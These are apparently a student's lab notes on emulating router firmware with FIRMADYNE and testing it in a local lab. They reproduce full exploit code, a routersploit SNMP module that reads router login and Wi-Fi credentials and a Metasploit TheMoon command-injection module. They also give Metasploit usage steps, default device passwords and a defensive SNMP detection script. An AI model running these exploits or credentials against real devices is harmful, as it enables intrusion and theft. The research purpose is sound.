###### tags: `firmadyne` `security`

# FIRMADYNE--Firmware with Vulnerability

## Select filename from analysis_results where routersploit_result_vuln!='Nothing':

Originally my senior wanted me to use SQL to find the rows with routersploit_result_vuln != 'Nothing', but I don't know SQL, and after searching for a whole day I still couldn't quite get it to work... So I figured I'd just do a "human select" and picked out the few entries below that the .sql file says have holes; I'll probably be busy with just these for a long time anyway~

Later I talked it over with 書銘, and we found that PostgreSQL can be used: create a new database, then change the connect line at the top of the .sql file to the new dbname. I didn't change it at first, and my original db got overwritten...

1. Create the database
   ```bash=
   sudo -u postgres createdb vulns
   ```
2. Import
   ```bash=
   sudo -u postgres psql -d vulns < ./firmware190405_1527.sql
   ```
3. Enter the psql shell
   ```bash=
   sudo -u postgres psql -d vulns
   ```
   Once inside, I could run the query my senior told me about, hehe. Because I needed it for myself, I also added id, so that I can just use the id when keeping my own notes~
4. select
   ```sql=
   Select id, filename from analysis_results where routersploit_result_vuln!='Nothing';
   ```

### 4004

```sql=
(4004, 'NWA1121-NI_2.10(AABJ.0)C0.zip', 'Nothing', 'service:telnet, user:admin, pass:1234 ', 'Thomson TWG849 Info Disclosure Linksys E-Series TheMoon RCE ', ''),
```

id=1

The first one I looked at is the one with id==4004; its routersploit_result_vuln column says it has two holes:
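The query above is just a filter on one column, so the same selection can also be done offline over the .sql dump itself when psql is not at hand. The script below is an added example and not code from the original notes: it tokenizes INSERT-style rows in the shape shown on this page, keeps those whose routersploit_result_vuln is not 'Nothing', splits the space-joined module names (using the three names that appear on this page) and the credential field, and counts hits per module. Only id, filename and routersploit_result_vuln are named on the page; the other columns are referred to by position, and the function names and the clean sample row 4005 are my own constructions.

```python
"""Added example: the "human select" done as code over an INSERT-style
FIRMADYNE .sql dump.  Columns other than id, filename and
routersploit_result_vuln are not named on the page and are used by position."""
import re
from collections import Counter

# Module names seen in this page's results; routersploit joins them with spaces.
KNOWN_MODULES = (
    "Thomson TWG849 Info Disclosure",
    "Linksys E-Series TheMoon RCE",
    "Zyxel P660HN-T v2 RCE",
)

# Constructed sample in the row format shown on this page.  The first line keeps
# the INSERT prefix a dump may carry; 4005 is an invented row with no findings.
SAMPLE_DUMP = """
INSERT INTO analysis_results VALUES (4004, 'NWA1121-NI_2.10(AABJ.0)C0.zip', 'Nothing', 'service:telnet, user:admin, pass:1234 ', 'Thomson TWG849 Info Disclosure Linksys E-Series TheMoon RCE ', '');
(4005, 'example-clean.bin', 'Nothing', 'Nothing', 'Nothing', ''),
(4103, 'DAP-1520_REVA_FIRMWARE_1.05.B02.ZIP', 'Nothing', 'Nothing', 'Linksys E-Series TheMoon RCE ', ''),
(4554, 'V200AAQF2b10.zip', 'Nothing', 'service:ftp, user:admin, pass:1234 service:ftp, user:supervisor, pass:zyad1234 service:telnet, user:admin, pass:1234 ', 'Zyxel P660HN-T v2 RCE ', ''),
(4588, 'V300ABCG8C0.zip', 'Nothing', 'Nothing', 'Thomson TWG849 Info Disclosure Zyxel P660HN-T v2 RCE ', ''),
"""

# A SQL single-quoted string (with '' as the escaped quote) or a bare integer.
_VALUE = re.compile(r"'((?:[^']|'')*)'|(\d+)")
_CRED = re.compile(r"service:(\w+), user:(\w*), pass:(\S*)")


def parse_row(line):
    """Turn one INSERT tuple into Python values (ints and unescaped strings)."""
    values = []
    for quoted, number in _VALUE.findall(line):
        values.append(int(number) if number else quoted.replace("''", "'"))
    return values


def split_modules(field, known=KNOWN_MODULES):
    """Split the space-joined routersploit_result_vuln field into module names.
    Greedy longest-match against the known list; an unrecognised tail is kept whole."""
    text, names = field.strip(), []
    while text:
        for name in sorted(known, key=len, reverse=True):
            if text.startswith(name):
                names.append(name)
                text = text[len(name):].strip()
                break
        else:
            names.append(text)
            break
    return names


def parse_credentials(field):
    """'service:telnet, user:admin, pass:1234 ...' -> [(service, user, password), ...]"""
    return [] if field.strip() == "Nothing" else _CRED.findall(field)


def select_vulnerable(dump_text):
    """Equivalent of: SELECT ... FROM analysis_results WHERE routersploit_result_vuln != 'Nothing'."""
    results = []
    for line in dump_text.splitlines():
        cols = parse_row(line)
        if len(cols) < 5 or not isinstance(cols[0], int):
            continue  # not a data row
        if cols[4].strip() == "Nothing":
            continue
        results.append({
            "id": cols[0],
            "filename": cols[1],
            "default_credentials": parse_credentials(cols[3]),  # column name assumed from its contents
            "modules": split_modules(cols[4]),
        })
    return results


def module_counts(results):
    """How many firmware images each routersploit module flagged."""
    return Counter(m for r in results for m in r["modules"])


if __name__ == "__main__":
    rows = select_vulnerable(SAMPLE_DUMP)
    for r in rows:
        print(r["id"], r["filename"], "->", ", ".join(r["modules"]))
    print(module_counts(rows))
```

Running it prints the four flagged rows from the sample and a per-module tally; pointing `select_vulnerable` at the text of a real dump gives the same list the query in step 4 returns.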
1. **Thomson TWG849 Info Disclosure**

   I googled the name of this hole to see what the vulnerability is basically about, and found two related things:

   * The description of the vulnerability

     This vulnerability was first found on the Thomson TWG849. It explains that some routers are managed over the SNMP protocol; the original intent is to let the management side send requests to the agent side to obtain some user information, but on this router the MIBs also allow local/remote network users to get information that should not be known, just like the management side, simply by sending a request: things like the **user interface credentials** and the **wireless network key value**. And if SNMPv1 and SNMPv2 do not provide enough protection, then the confidential information above can be obtained with just the default read-only community "private".

     reference: https://packetstormsecurity.com/files/133631/Thomson-CableHome-Gateway-DWG849-Information-Disclosure.html

   * The source code of this exploit on Routersploit

     ```python=
     from routersploit.core.exploit import *
     from routersploit.core.snmp.snmp_client import SNMPClient


     class Exploit(SNMPClient):
         __info__ = {
             "name": "Thomson TWG849 Info Disclosure",
             "description": "Module exploits Thomson TWG849 information disclosure vulnerability which allows reading sensitive information.",
             "authors": (
                 "Sebastian Perez",  # vulnerability discovery
                 "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
             ),
             "references": (
                 "https://packetstormsecurity.com/files/133631/Thomson-CableHome-Gateway-DWG849-Information-Disclosure.html",
             ),
             "devices": (
                 "Thomson TWG849",
             )
         }

         target = OptIP("", "Target IPv4 or IPv6 address")
         port = OptPort(161, "Target SNMP port")
         verbosity = OptBool(False, "Enable verbose output: true/false")

         def __init__(self):
             self.oids = {
                 # make, model, software version
                 "model": "1.3.6.1.2.1.1.1.0",
                 "uptime": "1.3.6.1.2.1.1.3.0",
                 # web interface credentials
                 "username": "1.3.6.1.4.1.4491.2.4.1.1.6.1.1.0",
                 "password": "1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0",
                 # ssid and key
                 "ssid1": "1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.32",
                 "ssid2": "1.3.6.1.4.1.4413.2.2.2.1.5.4.2.4.1.2.32",
                 # guest network oids
                 "guest1": "1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.33",
                 "guest2": "1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.34",
                 "guest3": "1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.35",
             }

         def run(self):
             res = []
             print_status("Reading parameters...")
             for name in self.oids.keys():
                 snmp_client = self.snmp_create()
                 snmp = snmp_client.get("private", self.oids[name])
                 if snmp:
                     value = str(snmp[0][1])
                     if value:
                         res.append((name, value))

             if res:
                 print_success("Exploit success")
                 print_table(("Parameter", "Value"), *res)
             else:
                 print_error("Exploit failed - could not read sensitive information")

         @mute
         def check(self):
             snmp_client = self.snmp_create()
             # sysDescr readable with the default read-only community means the device is exposed
             snmp = snmp_client.get("private", "1.3.6.1.2.1.1.1.0")

             if snmp:
                 return True  # target is vulnerable

             return False  # target is not vulnerable
     ```

2. **Linksys E-Series TheMoon RCE**

   Same thing: google the name, and you can also find the description of this vulnerability and its source code on Metasploit.

   - The description of the vulnerability

     It is related to the worm TheMoon~

   - The source code of this exploit on Metasploit

     ```ruby=
     ##
     # This module requires Metasploit: https://metasploit.com/download
     # Current source: https://github.com/rapid7/metasploit-framework
     ##

     class MetasploitModule < Msf::Exploit::Remote
       Rank = ExcellentRanking

       include Msf::Exploit::Remote::HttpClient
       include Msf::Exploit::CmdStager

       def initialize(info = {})
         super(update_info(info,
           'Name'           => 'Linksys E-Series TheMoon Remote Command Injection',
           'Description'    => %q{
             Some Linksys E-Series Routers are vulnerable to an unauthenticated OS command
             injection. This vulnerability was used from the so-called "TheMoon" worm. There
             are many Linksys systems that are potentially vulnerable, including E4200, E3200,
             E3000, E2500, E2100L, E2000, E1550, E1500, E1200, E1000, and E900. This module
             was tested successfully against an E1500 v1.0.5.
           },
           'Author'         =>
             [
               'Johannes Ullrich', #worm discovery
               'Rew', # original exploit
               'infodox', # another exploit
               'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module
               'juan vazquez' # minor help with msf module
             ],
           'License'        => MSF_LICENSE,
           'References'     =>
             [
               [ 'EDB', '31683' ],
               [ 'BID', '65585' ],
               [ 'OSVDB', '103321' ],
               [ 'PACKETSTORM', '125253' ],
               [ 'PACKETSTORM', '125252' ],
               [ 'URL', 'https://isc.sans.edu/diary/Linksys+Worm+%22TheMoon%22+Summary%3A+What+we+know+so+far/17633' ],
               [ 'URL', 'https://isc.sans.edu/forums/diary/Linksys+Worm+TheMoon+Captured/17630' ]
             ],
           'DisclosureDate' => 'Feb 13 2014',
           'Privileged'     => true,
           'Platform'       => %w{ linux unix },
           'Payload'        =>
             {
               'DisableNops' => true
             },
           'Targets'        =>
             [
               [ 'Linux mipsel Payload',
                 {
                   'Arch' => ARCH_MIPSLE,
                   'Platform' => 'linux'
                 }
               ],
               [ 'Linux mipsbe Payload',
                 {
                   'Arch' => ARCH_MIPSBE,
                   'Platform' => 'linux'
                 }
               ],
             ],
           'DefaultTarget'  => 0,
           'DefaultOptions' => { 'WfsDelay' => 30 }
         ))
         deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
       end

       def execute_command(cmd, opts)
         begin
           res = send_request_cgi({
             'uri'    => '/tmUnblock.cgi',
             'method' => 'POST',
             'encode_params' => true,
             'vars_post' => {
               "submit_button" => "",
               "change_action" => "",
               "action" => "",
               "commit" => "0",
               "ttcp_num" => "2",
               "ttcp_size" => "2",
               "ttcp_ip" => "-h `#{cmd}`",
               "StartEPI" => "1"
             }
           }, 2)
           return res
         rescue ::Rex::ConnectionError
           fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
         end
       end

       def check
         begin
           res = send_request_cgi({
             'uri'    => '/tmUnblock.cgi',
             'method' => 'GET'
           })
           if res && [200, 301, 302].include?(res.code)
             return Exploit::CheckCode::Detected
           end
         rescue ::Rex::ConnectionError
           return Exploit::CheckCode::Unknown
         end
         Exploit::CheckCode::Unknown
       end

       def exploit
         print_status("Trying to access the vulnerable URL...")
         unless check == Exploit::CheckCode::Detected
           fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")
         end
         print_status("Exploiting...")
         execute_cmdstager({:flavor => :wget})
       end
     end
     ```

There is a lot of code and I can't read through all of it at once, so I figured it would be more practical to get it set up first, haha!

#### NWA1121-NI_2.10(AABJ.0)C0.zip

1. The dir was changed earlier, so there is no need to change it again
2. Download [NWA1121-NI_2.10(AABJ.0)C0.zip](ftp://ftp.zyxel.com/NWA1121-NI/firmware/NWA1121-NI_2.10(AABJ.0)C0.zip)
3. Recover only the filesystem
   ```
   ./sources/extractor/extractor.py -b Zyxel -sql 127.0.0.1 -np -nk "NWA1121-NI_2.10(AABJ.0)C0.zip" images
   ```
4. Identify the architecture of firmware 1 and store the result in the image table of the database.
   ```
   ./scripts/getArch.sh ./images/1.tar.gz
   ```
5. Load the contents of the filesystem for firmware 1 into the database, populating the object and object_to_image tables.
   ```
   ./scripts/tar2db.py -i 1 -f ./images/1.tar.gz
   ```
6. Create the QEMU disk image for firmware 1.
   ```
   sudo ./scripts/makeImage.sh 1
   ```
7. Infer the network configuration for firmware 1.
   ```
   ./scripts/inferNetwork.sh 1
   ```

![](https://i.imgur.com/4jwnctq.png)

Same result as 書銘: no interface. Since that's the case, I might as well wait until 書銘 has sorted it out and then come back to this one, so I decided to move on to the next one first~

### 4103

```sql=
(4103, 'DAP-1520_REVA_FIRMWARE_1.05.B02.ZIP', 'Nothing', 'Nothing', 'Linksys E-Series TheMoon RCE ', ''),
```

id=2

This time I figured I'd get it running first and then look at what its hole is; otherwise, if I read all that and still can't test it, it's no use~

#### DAP-1520_REVA_FIRMWARE_1.05.B02.ZIP

1. The dir was changed earlier, so there is no need to change it again
2. Download [DAP-1520_REVA_FIRMWARE_1.05.B02.ZIP](ftp://ftp2.dlink.com/PRODUCTS/DAP-1520/REVA/DAP-1520_REVA_FIRMWARE_1.05.B02.ZIP)
3. Recover only the filesystem
   ```
   ./sources/extractor/extractor.py -b D-link -sql 127.0.0.1 -np -nk "DAP-1520_REVA_FIRMWARE_1.05.B02.ZIP" images
   ```
4. Identify the architecture of firmware 2 and store the result in the image table of the database.
   ```
   ./scripts/getArch.sh ./images/2.tar.gz
   ```
5. Load the contents of the filesystem for firmware 2 into the database, populating the object and object_to_image tables.
   ```
   ./scripts/tar2db.py -i 2 -f ./images/2.tar.gz
   ```
6. Create the QEMU disk image for firmware 2.
   ```
   sudo ./scripts/makeImage.sh 2
   ```
7. Infer the network configuration for firmware 2.
   ```
   ./scripts/inferNetwork.sh 2
   ```

![](https://i.imgur.com/CYI1YZr.png)

The IP is 192.168.0.50

8. Emulate firmware 2 with the inferred network configuration.
   ```
   ./scratch/2/run.sh
   ```

![](https://i.imgur.com/Pm2NuCR.png)

After it stopped here I first thought it might have broken, but then I went straight to the web page and it connected anyway. I don't know why it stops here, but since it can actually be used, I figured I'd just give it a try first.

![](https://i.imgur.com/FnN91km.png)

This firmware's CVE is the same as above, the Linksys E-Series TheMoon RCE hole. As mentioned earlier, it is included in Metasploit, so let's try it!

1. First scan with nmap to see whether there are any ports we can connect to. I found that 53/tcp and 80/http are open; we should be using port 80 shortly, so keep that in mind.

   ``nmap -sV -Pn 192.168.0.50``

   ![](https://i.imgur.com/5ojVad1.png)
2. Next, bring up the PostgreSQL server:

   ``/etc/init.d/postgresql start``

   ![](https://i.imgur.com/9u1SzqF.png)
3. Then Metasploit can be opened!!

   ``msfconsole``

   ```
   [-] No local database connected. Please connect to a local database before connecting to a remote data service.
   [-] ***
   [-] * WARNING: No database support: could not connect to server: Connection refused
       Is the server running on host "127.0.0.1" and accepting
       TCP/IP connections on port 5433?
   [-] ***
   ```

   ![](https://i.imgur.com/c3HDtku.png)

At this point I ran into a problem, so I googled it and found that it is because my msfconsole wanted to listen on port 5432, but that port was already in use, so it has to be changed.

First start it:
``service postgresql start``

Then check whether two processes want to use the same port:
``ss -lntp | grep post``

![](https://i.imgur.com/70NmdgY.png)

Here, since I had already changed it, only one service uses 5432. Below is the command for changing to port 5433:

```bash=
sed -i 's/\(port = \)5433/\15432/' /etc/postgresql/9.6/main/postgresql.conf
```

Then restart postgresql:
``service postgresql restart``
``msfdb reinit``

Now running msfconsole again no longer throws the same error~

![](https://i.imgur.com/LRAwC8T.png)

Once inside, first run ``search E3200`` and you can see that it does indeed have this hole, so next ``use`` it, then look at ``options``: the one marked YES that we haven't filled in yet is RHOST, i.e. the IP we want to hit. RHOSTS is still empty, so set RHOSTS to ``192.168.0.50``, confirm that RPORT is the 80 we scanned with nmap above, and finally also check that our payload is mipsel; if it's mipsbe, it has to be changed~

![](https://i.imgur.com/wu1q2iI.png)

Then run ``exploit``! and see whether the same vulnerability can be used! But the result says no session was created...

![](https://i.imgur.com/kwdFPW8.png)

### 4541

```sql=
(4541, 'NWA1123-AC_v2.10(AAOX.2)C0.zip', 'Nothing', 'service:telnet, user:admin, pass:1234 ', 'Thomson TWG849 Info Disclosure Linksys E-Series TheMoon RCE ', ''),
```

id=3

This one has no interface either...

![](https://i.imgur.com/ni3KeDd.png)

### 4554

```sql=
(4554, 'V200AAQF2b10.zip', 'Nothing', 'service:ftp, user:admin, pass:1234 service:ftp, user:supervisor, pass:zyad1234 service:telnet, user:admin, pass:1234 ', 'Zyxel P660HN-T v2 RCE ', ''),
```

### 4588

```sql=
(4588, 'V300ABCG8C0.zip', 'Nothing', 'Nothing', 'Thomson TWG849 Info Disclosure Zyxel P660HN-T v2 RCE ', ''),
```

### 4553

```sql=
(4553, 'V300ABCG8H0.zip', 'Nothing', 'service:telnet, user:admin, pass:1234 ', 'Thomson TWG849 Info Disclosure Zyxel P660HN-T v2 RCE ', ''),
```

### 4590

```sql=
(4590, 'V300ABCG8I0.zip', 'Nothing', 'Nothing', 'Thomson TWG849 Info Disclosure Zyxel P660HN-T v2 RCE ', ''),
```
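Several of the rows above are flagged with Thomson TWG849 Info Disclosure, whose routersploit module (quoted earlier) reads the credential and wireless-key OIDs with the default read-only community "private". As an added example that is not part of the original notes or of routersploit, the decoder below parses raw SNMPv1/v2c request bytes and flags requests for those OIDs, which is the detection side of the same issue and can be run over captured UDP/161 payloads. The OID list is copied from the module source on this page; treating "public" as a second default community, the function names and the two sample packets are my own constructions.

```python
"""Added example: minimal BER decoder for community-based SNMP requests that
flags reads of the OIDs the Thomson TWG849 Info Disclosure module targets."""

# OIDs the routersploit module reads, keyed to the names it uses (from the page).
SENSITIVE_OIDS = {
    "1.3.6.1.4.1.4491.2.4.1.1.6.1.1.0": "username",
    "1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0": "password",
    "1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.32": "ssid1",
    "1.3.6.1.4.1.4413.2.2.2.1.5.4.2.4.1.2.32": "ssid2",
    "1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.33": "guest1",
    "1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.34": "guest2",
    "1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.35": "guest3",
}
DEFAULT_COMMUNITIES = {"public", "private"}  # "private" is on the page; "public" is the other well-known default
PDU_TYPES = {0xA0: "GetRequest", 0xA1: "GetNextRequest", 0xA2: "GetResponse", 0xA3: "SetRequest"}


def read_tlv(buf, pos):
    """Read one BER TLV at buf[pos]; return (tag, contents, position after it)."""
    if pos + 2 > len(buf):
        raise ValueError("truncated TLV header")
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:  # long form: low 7 bits give the number of length octets
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    if pos + length > len(buf):
        raise ValueError("truncated TLV contents")
    return tag, buf[pos:pos + length], pos + length


def decode_oid(data):
    """BER OBJECT IDENTIFIER contents -> dotted string (first octet packs two arcs)."""
    arcs = [data[0] // 40, data[0] % 40]
    value = 0
    for octet in data[1:]:
        value = (value << 7) | (octet & 0x7F)
        if not octet & 0x80:  # a clear high bit ends a base-128 arc
            arcs.append(value)
            value = 0
    return ".".join(map(str, arcs))


def parse_snmp(packet):
    """Parse a community-based SNMP message into version, community, PDU type and OIDs."""
    tag, body, _ = read_tlv(packet, 0)
    if tag != 0x30:
        raise ValueError("not an SNMP message (outer SEQUENCE missing)")
    _, version, pos = read_tlv(body, 0)
    _, community, pos = read_tlv(body, pos)
    pdu_tag, pdu, _ = read_tlv(body, pos)
    pos = 0
    for _ in range(3):  # request-id, error-status, error-index
        _, _, pos = read_tlv(pdu, pos)
    _, varbinds, _ = read_tlv(pdu, pos)
    oids, pos = [], 0
    while pos < len(varbinds):
        _, varbind, pos = read_tlv(varbinds, pos)
        _, oid_bytes, _ = read_tlv(varbind, 0)  # first element of each VarBind is the OID
        oids.append(decode_oid(oid_bytes))
    return {
        "version": int.from_bytes(version, "big"),  # 0 = SNMPv1, 1 = SNMPv2c
        "community": community.decode("latin-1"),
        "pdu": PDU_TYPES.get(pdu_tag, hex(pdu_tag)),
        "oids": oids,
    }


def analyse(packet):
    """Return (severity, message) findings for one request; [] when nothing stands out."""
    msg = parse_snmp(packet)
    if msg["pdu"] not in ("GetRequest", "GetNextRequest"):
        return []
    default = msg["community"] in DEFAULT_COMMUNITIES
    findings = []
    for oid in msg["oids"]:
        if oid in SENSITIVE_OIDS:
            findings.append(("high" if default else "medium",
                             f"{msg['pdu']} for {SENSITIVE_OIDS[oid]} ({oid}) "
                             f"with community '{msg['community']}'"))
    if default and not findings:
        findings.append(("low", f"default community '{msg['community']}' used for {msg['pdu']}"))
    return findings


# Constructed sample 1: SNMPv1 GetRequest, community "private", for the password OID.
SAMPLE_CRED_REQUEST = bytes.fromhex(
    "30 2e  02 01 00  04 07 70 72 69 76 61 74 65"                            # SEQUENCE, version 0, "private"
    "a0 20  02 01 01  02 01 00  02 01 00"                                    # GetRequest, id 1, no error
    "30 15 30 13  06 0f 2b 06 01 04 01 a3 0b 02 04 01 01 06 01 02 00  05 00"  # VarBind: OID, NULL
)
# Constructed sample 2: SNMPv1 GetRequest, community "ops", for sysUpTime (1.3.6.1.2.1.1.3.0).
SAMPLE_BENIGN_REQUEST = bytes.fromhex(
    "30 23  02 01 00  04 03 6f 70 73"
    "a0 19  02 01 02  02 01 00  02 01 00"
    "30 0e 30 0c  06 08 2b 06 01 02 01 01 03 00  05 00"
)

if __name__ == "__main__":
    for pkt in (SAMPLE_CRED_REQUEST, SAMPLE_BENIGN_REQUEST):
        print(parse_snmp(pkt), analyse(pkt))
```

The first sample decodes to a GetRequest for the password OID with community "private" and is rated high; the second, an ordinary sysUpTime poll with a non-default community, produces no finding. Only GetRequest/GetNextRequest PDUs are scored, since responses and sets are a different question; the same decoder can be fed the UDP payloads from a capture one datagram at a time.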